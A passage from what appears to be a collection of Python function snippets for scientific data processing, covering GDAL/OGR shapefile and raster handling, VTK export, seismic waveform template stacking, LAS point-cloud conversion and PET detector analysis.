ogr.Feature(outLayerDefn)\n # set the geometry and attribute\n outFeature.SetGeometry(geom)\n for i in range(0, outLayerDefn.GetFieldCount()):\n outFeature.SetField(outLayerDefn.GetFieldDefn(i).GetNameRef(), inFeature.GetField(i))\n # add the feature to the shapefile\n outLayer.CreateFeature(outFeature)\n\n # destroy the features and get the next input feature\n if outFeature: outFeature = None\n inFeature = inLayer.GetNextFeature()\n\n counter += 1\n #print(counter)\n\n return outDataSet\n\n except RuntimeError as err:\n raise err\n except Exception as e:\n raise e\n\n finally:\n if inDataSet: outDataSet == None # give back control to C++\n if outDataSet: outDataSet == None\n if outLayer: outLayer == None\n if inFeature: inFeature == None\n if outFeature: outFeature = None", "def saveVelocityAndPressureVTK_binary(pressure,u,v,w,x,y,z,filename,dims):\n numEl_size = u.size; numEl = np.prod(numEl_size);\n # open the file and write the ASCII header:\n file = open(filename,'w')\n file.write('# vtk DataFile Version 3.0\\n')\n file.write('VTK file for data post-processed with Python\\n')\n file.write('Binary\\n\\n')\n file.write('DATASET STRUCTURED_GRID\\n')\n file.write('DIMENSIONS %d %d %d \\n'%(dims[0],dims[1],dims[2]))\n file.write('POINTS %d float\\n'%(numEl))\n file.close()\n \n # append binary x,y,z data\n file = open(filename,'ab')\n for i in range(len(x)): # there really needs to be a better way.\n pt = [x[i],y[i],z[i]]\n pt_buf = array('f',pt)\n pt_buf.byteswap()\n file.write(pt_buf)\n \n \n file.close()\n \n # append an ASCII sub header\n file = open(filename,'a')\n file.write('POINT_DATA %d \\n'%numEl)\n file.write('VECTORS velocity_vectors float\\n')\n file.close()\n \n # append binary u,v,w data\n file = open(filename,'ab')\n for i in range(len(u)):\n pt = [u[i],v[i],w[i]]\n pt_buf = array('f',pt)\n pt_buf.byteswap()\n file.write(pt_buf)\n \n file.close()\n \n # append ASCII sub header for scalar velocity magnitude data\n file = open(filename,'a')\n file.write('SCALARS VelocityMagnitude float\\n')\n file.write('LOOKUP_TABLE default\\n')\n \n file.close()\n \n file = open(filename,'ab')\n v_mag = np.sqrt(u**2+v**2+w**2)\n file = open(filename,'ab')\n p_buf = array('f',v_mag); p_buf.byteswap()\n file.write(p_buf)\n file.close()\n \n \n # append another ASCII sub header for the scalar pressure data\n file = open(filename,'a')\n file.write('SCALARS Pressure float\\n')\n file.write('LOOKUP_TABLE default\\n')\n file.close()\n \n # append binary pressure data\n file = open(filename,'ab')\n p_buf = array('f',pressure); p_buf.byteswap()\n file.write(p_buf)\n file.close()", "def cli(source_f, raster_f, output, verbose):\n with fiona.open(source_f, 'r') as source:\n source_driver = source.driver\n source_crs = source.crs\n sink_schema = source.schema.copy()\n\n source_geom = source.schema['geometry']\n if source_geom == 'Point':\n sink_schema['geometry'] = '3D Point'\n elif source_geom == 'LineString':\n sink_schema['geometry'] = '3D LineString'\n elif source_geom == '3D Point' or source_geom == '3D LineString':\n pass\n else:\n click.BadParameter(\"Source geometry type {} not implemented\".format(source_geom))\n\n with rasterio.open(raster_f) as raster:\n if source_crs != raster.crs:\n click.BadParameter(\"Features and raster have different CRS.\")\n if raster.count > 1:\n warnings.warn(\"Found {0} bands in {1}, expected a single band raster\".format(raster.bands, raster_f))\n supported = ['int16', 'int32', 'float32', 'float64']\n if raster.dtypes[0] not in supported:\n warnings.warn(\"Found {0} type in {1}, expected one of {2}\".format(raster.dtypes[0], raster_f, supported))\n with fiona.open(\n output, 'w',\n driver=source_driver,\n crs=source_crs,\n schema=sink_schema) as sink:\n\n for feature in source:\n try:\n feature_z = drapery.drape(raster, feature)\n sink.write({\n 'geometry': mapping(feature_z),\n 'properties': feature['properties'],\n })\n except Exception:\n logging.exception(\"Error processing feature %s:\", feature['id'])\n #print(sink.closed)\n #print(raster.closed)\n #print(source.closed)", "def run(self, verbose=False):\n from utils import write_to_file # function to write json to file\n self.read_json()\n graph = self.parse_jsons()\n json = self.pipe_vl2vg(graph)\n return self.write_to_file(rawinput=json, filetype='json', output_path=self.output_path, engine_name=self.engine_name, algorithm_name=self.algorithm_name, suffix=self.file_suffix, verbose=verbose)", "def compute_templates(filename, TDUR, filt, ratios, dt, ncor, window, \\\n winlength, nattempts, waittime, method='RMS'):\n # To transform latitude and longitude into kilometers\n a = 6378.136\n e = 0.006694470\n lat0 = 41.0\n lon0 = -123.0\n dx = (pi / 180.0) * a * cos(lat0 * pi / 180.0) / sqrt(1.0 - e * e * \\\n sin(lat0 * pi / 180.0) * sin(lat0 * pi / 180.0))\n dy = (3.6 * pi / 648.0) * a * (1.0 - e * e) / ((1.0 - e * e * sin(lat0 * \\\n pi / 180.0) * sin(lat0 * pi / 180.0)) ** 1.5)\n\n # Get the names of the stations which have a waveform for this LFE family\n file = open('../data/Plourde_2015/detections/' + filename + \\\n '_detect5_cull.txt')\n first_line = file.readline().strip()\n staNames = first_line.split()\n file.close()\n\n # Get the time of LFE detections\n LFEtime = np.loadtxt('../data/Plourde_2015/detections/' + filename + \\\n '_detect5_cull.txt', \\\n dtype={'names': ('unknown', 'day', 'hour', 'second', 'threshold'), \\\n 'formats': (np.float, '|S6', np.int, np.float, np.float)}, \\\n skiprows=2)\n\n # Get the network, channels, and location of the stations\n staloc = pd.read_csv('../data/Plourde_2015/station_locations.txt', \\\n sep=r'\\s{1,}', header=None)\n staloc.columns = ['station', 'network', 'channels', 'location', \\\n 'server', 'latitude', 'longitude']\n\n # Get the location of the source of the LFE\n LFEloc = np.loadtxt('../data/Plourde_2015/templates_list.txt', \\\n dtype={'names': ('name', 'family', 'lat', 'lon', 'depth', 'eH', \\\n 'eZ', 'nb'), \\\n 'formats': ('S13', 'S3', np.float, np.float, np.float, \\\n np.float, np.float, np.int)}, \\\n skiprows=1)\n for ie in range(0, len(LFEloc)):\n if (filename == LFEloc[ie][0].decode('utf-8')):\n lats = LFEloc[ie][2]\n lons = LFEloc[ie][3]\n xs = dx * (lons - lon0)\n ys = dy * (lats - lat0)\n\n # Create directory to store the waveforms\n namedir = 'templates/' + filename\n if not os.path.exists(namedir):\n os.makedirs(namedir)\n\n # Read origin time and station slowness files\n origintime = pickle.load(open('timearrival/origintime.pkl', 'rb'))\n slowness = pickle.load(open('timearrival/slowness.pkl', 'rb'))\n\n # File to write error messages\n errorfile = 'error/' + filename + '.txt'\n\n # Loop over stations\n for station in staNames:\n # Create streams\n EW = Stream()\n NS = Stream()\n UD = Stream()\n # Get station metadata for downloading\n for ir in range(0, len(staloc)):\n if (station == staloc['station'][ir]):\n network = staloc['network'][ir]\n channels = staloc['channels'][ir]\n location = staloc['location'][ir]\n server = staloc['server'][ir]\n # Compute source-receiver distance\n latitude = staloc['latitude'][ir]\n longitude = staloc['longitude'][ir]\n xr = dx * (longitude - lon0)\n yr = dy * (latitude - lat0)\n distance = sqrt((xr - xs) ** 2.0 + (yr - ys) ** 2.0)\n # Loop on LFEs\n for i in range(0, np.shape(LFEtime)[0]):\n YMD = LFEtime[i][1]\n myYear = 2000 + int(YMD[0 : 2])\n myMonth = int(YMD[2 : 4])\n myDay = int(YMD[4 : 6])\n myHour = LFEtime[i][2] - 1\n myMinute = int(LFEtime[i][3] / 60.0)\n mySecond = int(LFEtime[i][3] - 60.0 * myMinute)\n myMicrosecond = int(1000000.0 * \\\n (LFEtime[i][3] - 60.0 * myMinute - mySecond))\n Tori = UTCDateTime(year=myYear, month=myMonth, day=myDay, \\\n hour=myHour, minute=myMinute, second=mySecond, \\\n microsecond=myMicrosecond)\n Tstart = Tori - TDUR\n Tend = Tori + 60.0 + TDUR\n # First case: we can get the data from IRIS\n if (server == 'IRIS'):\n (D, orientation) = get_from_IRIS(station, network, channels, \\\n location, Tstart, Tend, filt, dt, nattempts, waittime, \\\n errorfile)\n # Second case: we get the data from NCEDC\n elif (server == 'NCEDC'):\n (D, orientation) = get_from_NCEDC(station, network, channels, \\\n location, Tstart, Tend, filt, dt, nattempts, waittime, \\\n errorfile)\n else:\n raise ValueError( \\\n 'You can only download data from IRIS and NCEDC')\n if (type(D) == obspy.core.stream.Stream):\n # Add to stream\n if (channels == 'EH1,EH2,EHZ'):\n EW.append(D.select(channel='EH1').slice(Tori, \\\n Tori + 60.0)[0])\n NS.append(D.select(channel='EH2').slice(Tori, \\\n Tori + 60.0)[0])\n UD.append(D.select(channel='EHZ').slice(Tori, \\\n Tori + 60.0)[0])\n else:\n EW.append(D.select(component='E').slice(Tori, \\\n Tori + 60.0)[0])\n NS.append(D.select(component='N').slice(Tori, \\\n Tori + 60.0)[0])\n UD.append(D.select(component='Z').slice(Tori, \\\n Tori + 60.0)[0])\n else:\n print('Failed at downloading data')\n # Stack\n if (len(EW) > 0 and len(NS) > 0 and len(UD) > 0):\n # Stack waveforms\n EWstack = linstack([EW], normalize=True, method=method) \n NSstack = linstack([NS], normalize=True, method=method)\n UDstack = linstack([UD], normalize=True, method=method)\n # Initializations\n maxCC = np.zeros(len(EW))\n cc0EW = np.zeros(len(EW))\n cc0NS = np.zeros(len(EW))\n cc0UD = np.zeros(len(EW))\n if (window == True):\n # Get time arrival\n arrivaltime = origintime[filename] + \\\n slowness[station] * distance\n Tmin = arrivaltime - winlength / 2.0\n Tmax = arrivaltime + winlength / 2.0\n if Tmin < 0.0:\n Tmin = 0.0\n if Tmax > EWstack[0].stats.delta * (EWstack[0].stats.npts - 1):\n Tmax = EWstack[0].stats.delta * (EWstack[0].stats.npts - 1)\n ibegin = int(Tmin / EWstack[0].stats.delta)\n iend = int(Tmax / EWstack[0].stats.delta) + 1\n # Cross correlation\n for i in range(0, len(EW)):\n ccEW = correlate(EWstack[0].data[ibegin : iend], \\\n EW[i].data[ibegin : iend], ncor)\n ccNS = correlate(NSstack[0].data[ibegin : iend], \\\n NS[i].data[ibegin : iend], ncor)\n ccUD = correlate(UDstack[0].data[ibegin : iend], \\\n UD[i].data[ibegin : iend], ncor)\n maxCC[i] = np.max(ccEW) + np.max(ccNS) + np.max(ccUD)\n cc0EW[i] = ccEW[ncor]\n cc0NS[i] = ccNS[ncor]\n cc0UD[i] = ccUD[ncor]\n else:\n # Cross correlation\n for i in range(0, len(EW)):\n ccEW = correlate(EWstack[0].data, EW[i].data, ncor)\n ccNS = correlate(NSstack[0].data, NS[i].data, ncor)\n ccUD = correlate(UDstack[0].data, UD[i].data, ncor)\n maxCC[i] = np.max(ccEW) + np.max(ccNS) + np.max(ccUD)\n cc0EW[i] = ccEW[ncor]\n cc0NS[i] = ccNS[ncor]\n cc0UD[i] = ccUD[ncor]\n # Sort cross correlations\n index = np.flip(np.argsort(maxCC), axis=0)\n EWbest = Stream()\n NSbest = Stream()\n UDbest = Stream()\n # Compute stack of best LFEs\n for j in range(0, len(ratios)):\n nLFE = int(ratios[j] * len(EW) / 100.0)\n EWselect = Stream()\n NSselect = Stream()\n UDselect = Stream()\n for i in range(0, nLFE):\n EWselect.append(EW[index[i]])\n NSselect.append(NS[index[i]])\n UDselect.append(UD[index[i]])\n # Stack best LFEs\n EWbest.append(linstack([EWselect], normalize=True, \\\n method=method)[0])\n NSbest.append(linstack([NSselect], normalize=True, \\\n method=method)[0])\n UDbest.append(linstack([UDselect], normalize=True, \\\n method=method)[0])\n # Plot figure\n plt.figure(1, figsize=(20, 15))\n params = {'xtick.labelsize':16,\n 'ytick.labelsize':16}\n pylab.rcParams.update(params) \n colors = cm.rainbow(np.linspace(0, 1, len(ratios)))\n # East - West component\n ax1 = plt.subplot(311)\n dt = EWstack[0].stats.delta\n nt = EWstack[0].stats.npts\n t = dt * np.arange(0, nt)\n for j in range(0, len(ratios)):\n if (method == 'RMS'):\n norm = EWbest[j].data / np.sqrt(np.mean(np.square( \\\n EWbest[j].data)))\n elif (method == 'MAD'):\n norm = EWbest[j].data / np.median(np.abs(EWbest[j].data - \\\n np.median(EWbest[j].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, color = colors[j], \\\n label = str(int(ratios[j])) + '%')\n if (method == 'RMS'):\n norm = EWstack[0].data / np.sqrt(np.mean(np.square( \\\n EWstack[0].data)))\n elif (method == 'MAD'):\n norm = EWstack[0].data / np.median(np.abs(EWstack[0].data - \\\n np.median(EWstack[0].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, 'k', label='All')\n if (window == True):\n plt.axvline(Tmin, linewidth=2, color='grey')\n plt.axvline(Tmax, linewidth=2, color='grey')\n plt.xlim([np.min(t), np.max(t)])\n plt.title('East - West component', fontsize=24)\n plt.xlabel('Time (s)', fontsize=24)\n plt.legend(loc=1)\n # North - South component\n ax2 = plt.subplot(312)\n dt = NSstack[0].stats.delta\n nt = NSstack[0].stats.npts\n t = dt * np.arange(0, nt)\n for j in range(0, len(ratios)):\n if (method == 'RMS'):\n norm = NSbest[j].data / np.sqrt(np.mean(np.square( \\\n NSbest[j].data)))\n elif (method == 'MAD'):\n norm = NSbest[j].data / np.median(np.abs(NSbest[j].data - \\\n np.median(NSbest[j].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, color = colors[j], \\\n label = str(int(ratios[j])) + '%')\n if (method == 'RMS'):\n norm = NSstack[0].data / np.sqrt(np.mean(np.square( \\\n NSstack[0].data)))\n elif (method == 'MAD'):\n norm = NSstack[0].data / np.median(np.abs(NSstack[0].data - \\\n np.median(NSstack[0].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, 'k', label='All')\n if (window == True):\n plt.axvline(Tmin, linewidth=2, color='grey')\n plt.axvline(Tmax, linewidth=2, color='grey')\n plt.xlim([np.min(t), np.max(t)])\n plt.title('North - South component', fontsize=24)\n plt.xlabel('Time (s)', fontsize=24)\n plt.legend(loc=1)\n # Vertical component\n ax3 = plt.subplot(313)\n dt = UDstack[0].stats.delta\n nt = UDstack[0].stats.npts\n t = dt * np.arange(0, nt)\n for j in range(0, len(ratios)):\n if (method == 'RMS'):\n norm = UDbest[j].data / np.sqrt(np.mean(np.square( \\\n UDbest[j].data)))\n elif (method == 'MAD'):\n norm = UDbest[j].data / np.median(np.abs(UDbest[j].data - \\\n np.median(UDbest[j].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, color = colors[j], \\\n label = str(int(ratios[j])) + '%')\n if (method == 'RMS'):\n norm = UDstack[0].data / np.sqrt(np.mean(np.square( \\\n UDstack[0].data)))\n elif (method == 'MAD'):\n norm = UDstack[0].data / np.median(np.abs(UDstack[0].data - \\\n np.median(UDstack[0].data)))\n else:\n raise ValueError('Method must be RMS or MAD')\n norm = np.nan_to_num(norm)\n plt.plot(t, norm, 'k', label='All')\n if (window == True):\n plt.axvline(Tmin, linewidth=2, color='grey')\n plt.axvline(Tmax, linewidth=2, color='grey')\n plt.xlim([np.min(t), np.max(t)])\n plt.title('Vertical component', fontsize=24)\n plt.xlabel('Time (s)', fontsize=24)\n plt.legend(loc=1)\n # End figure\n plt.suptitle(station, fontsize=24)\n plt.savefig(namedir + '/' + station + '.eps', format='eps')\n ax1.clear()\n ax2.clear()\n ax3.clear()\n plt.close(1)\n # Save stacks into files\n savename = namedir + '/' + station +'.pkl'\n pickle.dump([EWstack[0], NSstack[0], UDstack[0]], \\\n open(savename, 'wb'))\n for j in range(0, len(ratios)):\n savename = namedir + '/' + station + '_' + \\\n str(int(ratios[j])) + '.pkl'\n pickle.dump([EWbest[j], NSbest[j], UDbest[j]], \\\n open(savename, 'wb'))\n # Save cross correlations into files\n savename = namedir + '/' + station + '_cc.pkl'\n pickle.dump([cc0EW, cc0NS, cc0UD], \\\n open(savename, 'wb'))", "def create_dat_from_shapefile(windgrid_file, DAT_header, output_file, wind_field='Vg_mph'):\n t0 = time()\n output_file = output_file + '.dat'\n print('reading windgrid')\n t1 = time()\n gdf = gpd.read_file(windgrid_file)\n create_dat_from_geodataframe(\n gdf, DAT_header, output_file, wind_field=wind_field)", "def load_viewpoint(viewpoint_file):\n with open(viewpoint_file) as viewpoints:\n for line in viewpoints.readlines():\n yield VP(*line.strip().split())", "def _get_std_vmr_file(std_vmr_file):\n if std_vmr_file is None:\n gggpath = os.getenv('GGGPATH')\n if gggpath is None:\n raise GGGPathError('GGGPATH environmental variable is not defined. Either define it, explicitly pass a '\n 'path to a .vmr file with northern midlat profiles for all gases, or pass False to '\n 'only write the primary gases to the .vmr file')\n std_vmr_file = os.path.join(gggpath, 'vmrs', 'gnd', 'summer_35N.vmr')\n if not os.path.isfile(std_vmr_file):\n raise GGGPathError('The standard .vmr file is not present in the expected location ({}). Your GGGPATH '\n 'environmental variable may be incorrect, or the structure of the GGG directory has '\n 'changed. Either correct your GGGPATH value, explicitly pass a path to a .vmr file with '\n 'northern midlat profiles for all gases, or pass False to only write the primary gases '\n 'to the .vmr file'.format(std_vmr_file))\n return std_vmr_file\n else:\n return std_vmr_file", "def _create_farm_result_vector(\n base_vector_path, target_vector_path):\n base_vector = gdal.OpenEx(base_vector_path, gdal.OF_VECTOR)\n\n driver = gdal.GetDriverByName('ESRI Shapefile')\n target_vector = driver.CreateCopy(\n target_vector_path, base_vector)\n target_layer = target_vector.GetLayer()\n\n farm_pollinator_abundance_defn = ogr.FieldDefn(\n _POLLINATOR_ABUNDANCE_FARM_FIELD_ID, ogr.OFTReal)\n farm_pollinator_abundance_defn.SetWidth(25)\n farm_pollinator_abundance_defn.SetPrecision(11)\n target_layer.CreateField(farm_pollinator_abundance_defn)\n\n total_farm_yield_field_defn = ogr.FieldDefn(\n _TOTAL_FARM_YIELD_FIELD_ID, ogr.OFTReal)\n total_farm_yield_field_defn.SetWidth(25)\n total_farm_yield_field_defn.SetPrecision(11)\n target_layer.CreateField(total_farm_yield_field_defn)\n\n pol_proportion_farm_yield_field_defn = ogr.FieldDefn(\n _POLLINATOR_PROPORTION_FARM_YIELD_FIELD_ID, ogr.OFTReal)\n pol_proportion_farm_yield_field_defn.SetWidth(25)\n pol_proportion_farm_yield_field_defn.SetPrecision(11)\n target_layer.CreateField(pol_proportion_farm_yield_field_defn)\n\n wild_pol_farm_yield_field_defn = ogr.FieldDefn(\n _WILD_POLLINATOR_FARM_YIELD_FIELD_ID, ogr.OFTReal)\n wild_pol_farm_yield_field_defn.SetWidth(25)\n wild_pol_farm_yield_field_defn.SetPrecision(11)\n target_layer.CreateField(wild_pol_farm_yield_field_defn)\n\n target_layer = None\n target_vector.FlushCache()\n target_vector = None", "def read_vector_file(fname):\n return np.genfromtxt(fname)", "def convert(threshold, infile, tmpfile_1, tmpfile_2, outfile):\n args = [\n \"gdal_calc.py\",\n '-A', infile,\n '--outfile={}'.format(tmpfile_1),\n '--calc=logical_and(A>={}, A<999)'.format(threshold),\n '--type=Byte', '--NoDataValue=0',\n '--co=SPARSE_OK=YES',\n '--co=NBITS=1',\n '--quiet'\n # Could enable compression\n # --co=\"COMPRESS=LZW\"\n ]\n subprocess.run(args)\n\n subprocess.run([\n \"gdal_polygonize.py\",\n tmpfile_1,\n '-q',\n '-f', 'ESRI Shapefile',\n tmpfile_2\n ])\n\n subprocess.run([\n \"ogr2ogr\",\n '-a_srs', 'EPSG:4326',\n outfile,\n tmpfile_2\n ])\n\n subprocess.run([\"rm\", tmpfile_1])\n subprocess.run([\"rm\", tmpfile_2])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'shx')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'dbf')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'prj')])", "def generate_ROI_file(FreeSurfer_ROI_file):\n\tfrom nipype.interfaces.freesurfer import MRIConvert\n\tmc = MRIConvert()\n\tmc.inputs.in_file = FreeSurfer_ROI_file\n\tmc.inputs.out_type = 'niigz'\n\tmc.run()\n\n\timport nipype.interfaces.cmtk as cmtk\n\trg = cmtk.ROIGen()\n\trg.inputs.aparc_aseg_file = FreeSurfer_ROI_file.split('.')[0] + '_out.nii.gz'\n\trg.inputs.use_freesurfer_LUT = True\n\tout_file = rg.run()\n\n\treturn out_file", "def read_DEM(fn=None, fjord=None):\n # intake.open_rasterio accepts a list of input files and may effectively do what this function does!\n # try using cropped versions of the input files. Doesn't seem to make a difference r.e. crashing\n '''\n cropped_fn = fn.rpartition(\".tif\")[0] + \"_cropped.tif\"\n print(cropped_fn)\n if os._exists(cropped_fn):\n fn = cropped_fn\n elif fjord != None:\n bbox = fjord_props.get_fjord_bounds(fjord)\n ds = rioxarray.open_rasterio(fn)\n trimmed_ds = ds.rio.slice_xy(*bbox)\n trimmed_ds.rio.to_raster(fn.rpartition(\".tif\")[0] + \"_cropped.tif\")\n del ds\n del trimmed_ds\n fn = cropped_fn \n '''\n\n # try bringing in the rasters as virtual rasters (i.e. lazily loading)\n with rasterio.open(fn) as src:\n # print('Source CRS:' +str(src.crs))\n # print(src.is_tiled)\n # print(src.block_shapes)\n with WarpedVRT(src,src_crs=src.crs,crs=src.crs) as vrt:\n # warp_mem_limit=12000,warp_extras={'NUM_THREADS':2}) as vrt:\n # print('Destination CRS:' +str(vrt.crs))\n darr = xr.open_rasterio(vrt)\n # ds = rioxarray.open_rasterio(vrt).chunk({'x':1500,'y':1500,'band':1}).to_dataset(name='HLS_Red')\n\n\n # Rasterio automatically checks that the file exists\n # ultimately switch to using rioxarray, but it causes issues down the pipeline so it will need to be debugged through\n # with rioxarray.open_rasterio(fn) as src:\n # with xr.open_rasterio(fn) as darr:\n # darr = src\n\n # open_rasterio automatically brings the geotiff in as a DataArray with 'band' as a dimensional coordinate\n # we rename it and remove the band as a coordinate, since our DEM only has one dimension\n # squeeze removes dimensions of length 0 or 1, in this case our 'band'\n # Then, drop('band') actually removes the 'band' dimension from the Dataset\n darr = darr.rename('elevation').squeeze().drop_vars('band')\n # darr = darr.rename({'band':'dtime'})\n \n # if we wanted to instead convert it to a dataset\n # attr = darr.attrs\n # darr = darr.to_dataset(name='elevation').squeeze().drop('band')\n # darr.attrs = attr\n # attr=None\n # newest version of xarray (0.16) has promote_attrs=True kwarg. Earlier versions don't...\n # darr = darr.to_dataset(name='elevation', promote_attrs=True).squeeze().drop('band')\n\n # mask out the nodata values, since the nodatavals attribute is wrong\n darr = darr.where(darr != -9999.)\n\n # the gdalwarp geoid files have this extra attribute in the geoTiff, which when brought in\n # ultimately causes a \"__module__\" related error when trying to plot with hvplot\n try:\n del darr.attrs[\"units\"] \n except KeyError:\n pass\n\n if fjord != None:\n # USE RIOXARRAY - specifically, slicexy() which can be fed the bounding box\n # darr = darr.rio.slice_xy(fjord_props.get_fjord_bounds(fjord))\n bbox = fjord_props.get_fjord_bounds(fjord)\n if pd.Series(darr.y).is_monotonic_increasing:\n darr = darr.sel(x=slice(bbox[0], bbox[2]), y=slice(bbox[1], bbox[3]))\n else:\n darr = darr.sel(x=slice(bbox[0], bbox[2]), y=slice(bbox[3], bbox[1]))\n \n return darr", "def write_input(self):\n # load template, substitute parameters and write input file\n self.homog_core()\n self.write_mat_string()\n input_tmpl = open('base_input.txt')\n templ = Template(input_tmpl.read())\n file_string = templ.substitute(cool_frac = self.vfrac_cermet,\n r_core = self.r,\n core_z = self.z,\n r_refl = self.r + self.refl_t,\n refl_min = -self.refl_t,\n refl_max = self.z + self.refl_t,\n fuel_string = self.fuel_string,\n fuel_rho = self.rho,\n fuel_vol = self.core_vol,\n refl_vol = self.core_vol,\n thermal_power = self.Q_therm)\n # write the file\n filename = 'r_{0}_{1}.i'.format(round(self.vfrac_cermet, 3), \n round(self.r, 3))\n ifile = open(filename, 'w')\n ifile.write(file_string)\n ifile.close()\n\n return filename", "def align_rasters(ref_raster, tar_raster, output_suffix):\n command = [\"gdalbuildvrt\", \"-te\"]\n hDataset = gdal.Open(ref_raster, gdal.GA_ReadOnly)\n if hDataset is None:\n return False\n adfGeoTransform = hDataset.GetGeoTransform(can_return_null=True)\n\n tif_file=tar_raster\n vrt_file = tif_file.replace('.tif', '.vrt')\n\n if adfGeoTransform is not None:\n dfGeoXUL = adfGeoTransform[0]\n dfGeoYUL = adfGeoTransform[3]\n dfGeoXLR = adfGeoTransform[0] + adfGeoTransform[1] * hDataset.RasterXSize + \\\n adfGeoTransform[2] * hDataset.RasterYSize\n dfGeoYLR = adfGeoTransform[3] + adfGeoTransform[4] * hDataset.RasterXSize + \\\n adfGeoTransform[5] * hDataset.RasterYSize\n xres = str(abs(adfGeoTransform[1]))\n yres = str(abs(adfGeoTransform[5]))\n\n subprocess.call(command + [str(dfGeoXUL), str(dfGeoYLR), str(dfGeoXLR),\n str(dfGeoYUL), \"-q\", \"-tr\", xres, yres,\n vrt_file, tif_file])\n\n output_file = tif_file.replace('.tif', output_suffix)\n\n print('gdal_translate -q {} {}'.format(vrt_file, output_file))\n\n cmd = 'gdal_translate -q {} {}'.format(vrt_file, output_file)\n\n #print(dfGeoXUL, dfGeoYLR, dfGeoXLR, dfGeoYUL, xres, yres)\n\n subprocess.call(cmd, shell=True)\n os.remove(vrt_file)\n\n return True\n\n else:\n\n return False", "def exec_ripser(data_path,output_path,max_dim,input_file='input.txt',format_file = 'lower-distance',threshold=None):\n ############# RIPSER ####################\n # high dimension\n ## execfile ripser (OUTPUT from ripser)\n start = timeit.default_timer() \n print 'input_file ',input_file\n input_file_full = os.path.join(data_path,input_file)\n output_file_full = os.path.join(output_path,'output_ripser.txt')\n\n if threshold is None:\n ripser_arguments = 'ripser --format %s --dim %i %s'%(format_file,max_dim,input_file_full)\n else:\n ripser_arguments = 'ripser --format %s --dim %i --threshold %f %s'%(format_file,max_dim,threshold,input_file_full)\n \n ripser_call(ripser_arguments.split(' '),output_file_full)\n #os.system(ripser_call) # OLD CALL BASED ON executable\n\n stop = timeit.default_timer()\n print 'Ripser execution time '\n print stop - start \n input_file_path = os.path.join(data_path,'input.txt')\n if(os.path.isfile(input_file_path)):\n os.remove(input_file_path) ## remove auxiliar file with lower matrix used as input for Ripser\n return()", "def process_input_file(filename):\n f = open(filename, 'r')\n\n rows = []\n i = 0\n for line in f:\n # skip optimal steps and time limit\n if i > 1 and len(line.strip()) > 0:\n rows.append(list(line.strip()))\n i += 1\n\n f.close()\n\n row_len = len(rows[0])\n num_rows = len(rows)\n\n return LaserTankMap(row_len, num_rows, rows)", "def main(fn_input, fn_output):\n # read file\n inter = Interpolator()\n inter.read_file(fn_input)\n inter.write_interpolated(fn_output)", "def convert(input, output, point_format_id, file_version, force):\n if (\n point_format_id is not None\n and point_format_id not in pylas.supported_point_formats()\n ):\n click.echo(\n click.style(\n \"Point format {} is not supported\".format(point_format_id), fg=\"red\"\n )\n )\n raise click.Abort()\n\n if file_version is not None and file_version not in pylas.supported_versions():\n click.echo(\n click.style(\n \"LAS version {} is not supported\".format(file_version), fg=\"red\"\n )\n )\n raise click.Abort()\n\n las = pylas.read(openbin_file(input))\n if point_format_id is not None and not force:\n lost_dimensions = pylas.lost_dimensions(\n las.points_data.point_format.id, point_format_id\n )\n if lost_dimensions:\n click.echo(\"Converting will lose: {}\".format(lost_dimensions))\n click.confirm(\"Continue ?\", abort=True)\n\n try:\n las = pylas.convert(\n las, point_format_id=point_format_id, file_version=file_version\n )\n except pylas.errors.PylasError as e:\n click.echo(click.style(\"{}: {}\".format(e.__class__.__name__, e), fg=\"red\"))\n raise click.Abort()\n except Exception as e:\n click.echo(click.style(str(e), fg=\"red\"))\n raise click.Abort()\n else:\n las.write(openbin_file(output, mode='w'), do_compress=output.endswith('.laz'))", "def build_r_map(input_file: str, output_file: str, threshold: float):\n\n DataSiPM = db.DataSiPMsim_only('petalo', 0) # full body PET\n DataSiPM_idx = DataSiPM.set_index('SensorID')\n\n try:\n sns_response = pd.read_hdf(input_file, 'MC/sns_response')\n except ValueError:\n print(f'File {input_file} not found')\n exit()\n except OSError:\n print(f'File {input_file} not found')\n exit()\n except KeyError:\n print(f'No object named MC/sns_response in file {input_file}')\n exit()\n print(f'Analyzing file {input_file}')\n\n sel_df = rf.find_SiPMs_over_threshold(sns_response, threshold)\n\n particles = pd.read_hdf(input_file, 'MC/particles')\n hits = pd.read_hdf(input_file, 'MC/hits')\n events = particles.event_id.unique()\n\n true_r1, true_r2 = [], []\n var_phi1, var_phi2 = [], []\n var_z1, var_z2 = [], []\n\n touched_sipms1, touched_sipms2 = [], []\n\n for evt in events:\n\n ### Select photoelectric events only\n evt_parts = particles[particles.event_id == evt]\n evt_hits = hits [hits .event_id == evt]\n select, true_pos = mcf.select_photoelectric(evt_parts, evt_hits)\n if not select: continue\n\n sns_resp = sel_df[sel_df.event_id == evt]\n if len(sns_resp) == 0: continue\n\n _, _, pos1, pos2, q1, q2 = rf.assign_sipms_to_gammas(sns_resp, true_pos, DataSiPM_idx)\n\n if len(pos1) > 0:\n pos_phi = rf.from_cartesian_to_cyl(np.array(pos1))[:,1]\n _, var_phi = rf.phi_mean_var(pos_phi, q1)\n\n pos_z = np.array(pos1)[:,2]\n mean_z = np.average(pos_z, weights=q1)\n var_z = np.average((pos_z-mean_z)**2, weights=q1)\n r = np.sqrt(true_pos[0][0]**2 + true_pos[0][1]**2)\n\n var_phi1 .append(var_phi)\n var_z1 .append(var_z)\n touched_sipms1.append(len(pos1))\n true_r1 .append(r)\n\n else:\n var_phi1 .append(1.e9)\n var_z1 .append(1.e9)\n touched_sipms1.append(1.e9)\n true_r1 .append(1.e9)\n\n if len(pos2) > 0:\n pos_phi = rf.from_cartesian_to_cyl(np.array(pos2))[:,1]\n _, var_phi = rf.phi_mean_var(pos_phi, q2)\n\n pos_z = np.array(pos2)[:,2]\n mean_z = np.average(pos_z, weights=q2)\n var_z = np.average((pos_z-mean_z)**2, weights=q2)\n r = np.sqrt(true_pos[1][0]**2 + true_pos[1][1]**2)\n\n var_phi2 .append(var_phi)\n 